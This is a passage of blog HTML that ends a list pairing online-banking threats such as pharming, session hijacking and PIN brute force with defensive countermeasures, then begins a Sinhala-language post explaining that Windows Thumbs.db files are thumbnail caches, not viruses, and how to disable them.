class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l6 level1 lfo4; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Smartcard reader manipulator</span></p> <p class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0.0001pt 1in; text-indent: -0.25in; line-height: normal;"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=";font-family:Calibri;font-size:12.0pt;" >Secure smartcard interface design and implementation</span></p><p class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0.0001pt 1in; text-indent: -0.25in; line-height: normal; text-align: center;"><br /></p><p class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0.0001pt 1in; text-indent: -0.25in; line-height: normal; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz3FRStPR6oIvMFqHRjt96zAgl39hJDOilFQ-Be5te1cwblojysyPm3ub8-olS9klMUocVMUTEpRuXMakpWLfGA70kOzWf-PcgKWOKRNbdKddyUhgtVmcARcydtgK8WO9ZEEgrrfVqmY/s1600/11.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 249px; height: 243px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz3FRStPR6oIvMFqHRjt96zAgl39hJDOilFQ-Be5te1cwblojysyPm3ub8-olS9klMUocVMUTEpRuXMakpWLfGA70kOzWf-PcgKWOKRNbdKddyUhgtVmcARcydtgK8WO9ZEEgrrfVqmY/s400/11.jpg" alt="" id="BLOGGER_PHOTO_ID_5652195452660818258" border="0" /></a></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l6 level1 lfo4; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Brute force attacks with PIN calculations</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l6 level2 lfo4;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Increasing number of digits (at least eight digits)</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l7 level1 lfo5; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Social engineering</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l7 level2 lfo5;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Increasing security awareness </span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l7 level2 lfo5;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Simple URLs that are easy to remember</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l7 level2 lfo5;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Antiphishing software (URL inspection)</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l7 level1 lfo5; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Web page obfuscation</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l7 level2 lfo5;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Monitoring the domain name server (DNS)</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l7 level2 lfo5;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Prohibiting the IP addresses instead of URLs.</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l7 level2 lfo5;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Using predetermined list of valid URLs.</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l5 level1 lfo6; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Pharming</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l5 level2 lfo6;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Monitoring the server</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l5 level2 lfo6;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Patch management</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l5 level2 lfo6;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Intrusion/anomaly detection</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l5 level2 lfo6;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Firewall</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l5 level1 lfo6; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> <span style="font-weight: bold;"> </span></span></span></span><span style=" font-weight: bold;font-size:12pt;" >Active man in the middle attacks</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l5 level2 lfo6;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Using predetermined SSL certificates</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l5 level2 lfo6;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Mutual authentication and encryption through client-server SSL</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l3 level1 lfo7; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Session hijacking</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l3 level2 lfo7;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >State management to prevent session ID specification in the message, session ID rotation and life cycle management</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l3 level1 lfo7; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Brute force attacks</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l3 level2 lfo7;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Monitoring the server</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l3 level2 lfo7;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Patch management</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l3 level2 lfo7;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Intrusion/anomaly detection</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l3 level2 lfo7;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Firewall</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l1 level1 lfo8; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Bank security policy violation</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l1 level2 lfo8;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Security policy implementation according to standards such as ISO 17799</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l1 level1 lfo8; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Website manipulation</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l1 level2 lfo8;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Monitoring the server</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l1 level2 lfo8;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Patch management</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l1 level2 lfo8;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Intrusion/anomaly detection</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l1 level2 lfo8;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Firewall</span></p>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com1tag:blogger.com,1999:blog-7802132138133841506.post-39082591582542944932011-09-13T08:46:00.000-07:002011-09-30T20:27:01.230-07:00Thumbs.db කියන්නෙ මොනවාද?<div style="text-align: left;">වින්ඩෝස් මෙහෙයුම් පද්ධති පාවිච්චි කරන අයට සමහර විට තියෙන්න පුළුවන් ගැටළුවක් තමයි මොනවද මේ Thumbs.db ගොනු කියල. මේ Thumbs.db ගොනු දකින්න පුලුවන් වෙන්නෙ පින්තූර, වීඩියෝ එහෙම තියෙන folders වල. කොච්චර delete කලත් ආපහු හැදෙනවා. මම මීට අවුරුදු 3කට 4කට කලින් (ඒ කාලෙ පාවිච්චි කලේ වින්ඩෝස් XP) හිතාගෙන හිටියෙ Thumbs.db කියන්නෙ වෛරස් එකක් කියල. ඉතින් ඕක සැරින් සැරේ මකන එක තමයි වැඩේ!!. මේ ලඟදි මගෙ වින්ඩෝස් 7 මෙහෙයුම් පද්ධතියෙත් Thumbs.db ගොනු වගයක් හැදිල තිබුනම Thumbs.db ගැන අමිහිරි මතකය මතක් උනා. ඉතින් මේ ගැන බ්ලොග් එකක් ලියන්න හිතුව මට වගේම Thumbs.db දකින එක හිසරදයක් වුන අය ඉන්නවනම් ඒක සනීප කර ගන්න.</div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><span class="Apple-style-span"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggJpj6-FFIWRO4rGJ7w04kaSs__oTyPekCd9uePFy0w_vahjyu4c-Osq2Zxn3RRC4DVoNJiLQbRFSeyoVeM87gCpV6m2C85IqsjvkJhhiR_3kkwYCwD_HssnPpSmlLzYeCDhhGcxGfjng/s400/1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651876859276317250" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 116px; " /></span></span></div><div><div style="text-align: center;"><span class="Apple-style-span"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span"><span class="Apple-style-span" style="color: rgb(0, 0, 0); ">Thumbs.db කියන්නෙ Extension දිහා බලපුහාමනම් Database File එකක්. ඇත්තටම </span></span>Thumbs.db කියන්නෙ System File එකක්. මේක අපිට Thumbnail Cache File කියල හදුන්වන්න පුළුවන්. මේක හදන්නෙ Windows Explorer එකෙන්. මේක වෛරස් එකක් නෙමෙයි. අපි Folders වල තියෙන පින්තූර එහෙම Thumbnail View එකෙන් බලනකොට Windows Explorer එකට සිදු වෙනවා ඒ ෆෝල්ඩරය ඇතුලෙ Thumbnail Icons හදන්න. Thumbs.db කියන්නෙ Cache File එකක් ඒකෙන් කරන්නෙ අර Thumbnail Icons තොරතුරු ගබඩා කරගන්න එක ඔබ දෙවෙනි පාරටත් එකම ෆෝල්ඩරය Thumbnail View එකෙන් බලනකොට Windows Explorer එකට ඕනි වෙන්නෙ ඒ ෆෝල්ඩරය ඇතුලෙ ආයෙමත් අලූතින් Thumbnail Icons හදන්න, එයා Thumbs.db ගොනුවෙන් අර තොරතුරු අරන් Thumbnail Icons පෙන්වනවා. මේකෙන් දෙවනි වරට Thumbnail View එකෙන් බලනකොට වේගයෙන් අදාල පින්තූර වල Thumbnail Views ලබා දෙනවා. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">Thumbs.db කියන්නෙ වෛරස් එකක් නොවෙන අතරම ඒකෙන් පරිඝනකයේ වේගයට බලපෑමක් කරන්නෙත් නැහැ. නමුත් පරිඝනකයේ හාර්ඩ් ඩිස්ක් එකේ ඉඩනම් මේ ගොනු සදහා වැය වෙනවා. සමහර වෙලාවට Thumbs.db තියෙන එක මහ කරදයක් වෙන්නෙ ඒකෙන් අපේ Folder Preferences වෙනස් කරන එකයි. යම්කිසි ගොනුවක අපි Folder View එක ලැයිස්තුවක් ආකාරයෙන් (List) හෝ තොරතුරු සහිතව (Detailed) ඉදිරිපත් කරන්න කියල Folder Settings හැදුවත් ඒ ෆෝල්ඩරය ඇතුලෙ Thumbs.db ගොනුවක් තිබුනොත් අපේ විධානය නොසලකා හැරල Thumbnail View එකෙන්ම ගොනුව ඉදිරිපත් කරන එක. මේක සාමාන්යයෙන් Hidden File එකක් විදිහට තමයි තියෙන්නෙ. ඒ නිසා අපිට මේක පෙනෙන්නෙ Hidden Files පෙනෙන විදිහට Folder Settings හදල තිබුනොත් විතරයි.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Thumbs.db ඉවත් කරන්න ක්රම කීප ආකාරයක්ම තියෙනවා. මම එක ආකාරයක් විස්තර කරන්නම්.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">වින්ඩෝස් ස්ටාර්ට් බාර් (Start Bar) එකේ සර්ච් (Search) කියන තැන හෝ යතුරු පුවරුවේ වින්ඩෝස් බොත්තම හා R (Windows Key + R) බොත්තම එකවට එබීමෙන් එන Run එකේ <span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); ">gpedit.msc කියල ලියනය කරල Enter කිරීම. </span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); "><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><span class="Apple-style-span"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJo11J7I8rKzcztvKkSCIrK_acwGPHRId-1gyTipfxZgyfMVbWkbj-JAiVm7g81Zp4yoozAy09U_o_lM2F1Y1X1FwoeoNxXDCHBAYWK6Xp4j4TDQmVQya8B0_6dHLidXzXUj8-Q56jHGI/s1600/3.jpg" style="font-family: Georgia, serif; " onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img 